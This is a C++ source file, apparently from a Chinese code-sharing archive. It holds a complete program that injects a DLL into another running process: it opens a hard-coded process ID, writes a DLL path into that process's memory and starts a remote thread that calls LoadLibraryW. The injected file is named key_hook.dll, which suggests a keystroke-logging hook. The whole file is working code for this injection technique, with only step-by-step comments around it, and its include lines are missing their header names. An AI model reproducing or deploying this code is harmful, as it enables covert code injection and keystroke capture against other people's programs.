thread_insert.rar insertdll.cpp

www.pudn.com > thread_insert.rar > insertdll.cpp
// insertdll.cpp : Defines the entry point for the application. 
// 
 
#include "stdafx.h" 
#include  
#include  
#include  
void insertdll(void); 
void CheckError ( int, int, char *); 
PDWORD pdwThreadId;	// 
HANDLE hRemoteThread, hRemoteProcess;	// 
DWORD fdwCreate, dwStackSize, dwRemoteProcessId; 
PWSTR pszLibFileRemote=NULL;	// 
 
int APIENTRY WinMain(HINSTANCE hInstance, 
                     HINSTANCE hPrevInstance, 
                     LPSTR     lpCmdLine, 
                     int       nCmdShow) 
{ 
 	// TODO: Place code here.   
	insertdll(); 
	return 0; 
} 
 
void insertdll(void) 
{ 
	int iReturnCode; 
	char lpDllFullPathName[MAX_PATH]; 
	WCHAR pszLibFileName[MAX_PATH]={0}; 
 
	dwRemoteProcessId = 1284;	//被插入dll的远程线程PID 
	strcpy(lpDllFullPathName, "d:\\key_hook.dll");	//DLL路径 
 
	//将DLL文件全路径的ANSI码转换成UNICODE码 
 
	iReturnCode=MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, 
						lpDllFullPathName,strlen(lpDllFullPathName), 
											pszLibFileName, MAX_PATH); 
	CheckError(iReturnCode, 0, "MultByteToWideChar"); 
	//打开远程进程 
	hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD |		//允许创建线程 
								PROCESS_VM_OPERATION |		//允许VM操作  
									PROCESS_VM_WRITE,		//允许VM写 
							FALSE, dwRemoteProcessId );// 
	printf("OpenProcess OK\n"); 
	CheckError( (int) hRemoteProcess,NULL, "Remote Process not Exist or Access Denied!");// 
	//计算DLL路径名需要的内存空间 
	int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); //为什么加1 呢? 
	//申请远程线程内存 返回地址指针 是强制转换过的PWSTR  
	pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);	// 
	CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx"); 
		printf("VirtualAllocEx OK\n"); 
	//将DLL的路径名复制到远程进程的内存空间 
	iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
	CheckError(iReturnCode, false, "WriteProcessMemory"); 
	//计算LoadLibraryW的入口地址 
	PTHREAD_START_ROUTINE pfnStartAddr =(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 
	CheckError((int)pfnStartAddr, NULL, "GetProcAddress");  
	//启动远程线程，通过远程线程调用用户的DLL文件 
	hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL); 
		 
	CheckError((int)hRemoteThread, NULL, "Create Remote Thread"); 
		printf("CreateRemoteThread OK\n"); 
	//等待远程线程退出 
	WaitForSingleObject(hRemoteThread, INFINITE); 
	//清场处理  
	printf("WaitForSingleObject ...\n"); 
	if(pszLibFileRemote != NULL) 
	{	printf("VirtualFreeEx..\n"); 
		VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); 
	} 
	if(hRemoteThread != NULL) 
	{	printf("CloseHandle...\n"); 
		CloseHandle(hRemoteThread ); 
	} 
	if(hRemoteProcess!= NULL) 
	{	printf("CloseHandle...\n"); 
		CloseHandle(hRemoteProcess); 
	} 
} 
 
	//错误处理函数CheckError() 
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg) 
{ 
	if(iReturnCode==iErrorCode) 
	{ 
		printf("%s Error:%d\n\n", pErrorMsg, GetLastError()); 
		//清场处理 
		if (pszLibFileRemote != NULL) 
		{	VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); 
		} 
		if(hRemoteThread != NULL) 
		{	CloseHandle(hRemoteThread); 
		} 
		if(hRemoteProcess!= NULL) 
		{	CloseHandle(hRemoteProcess); 
		} 
	exit(0); 
	} 
}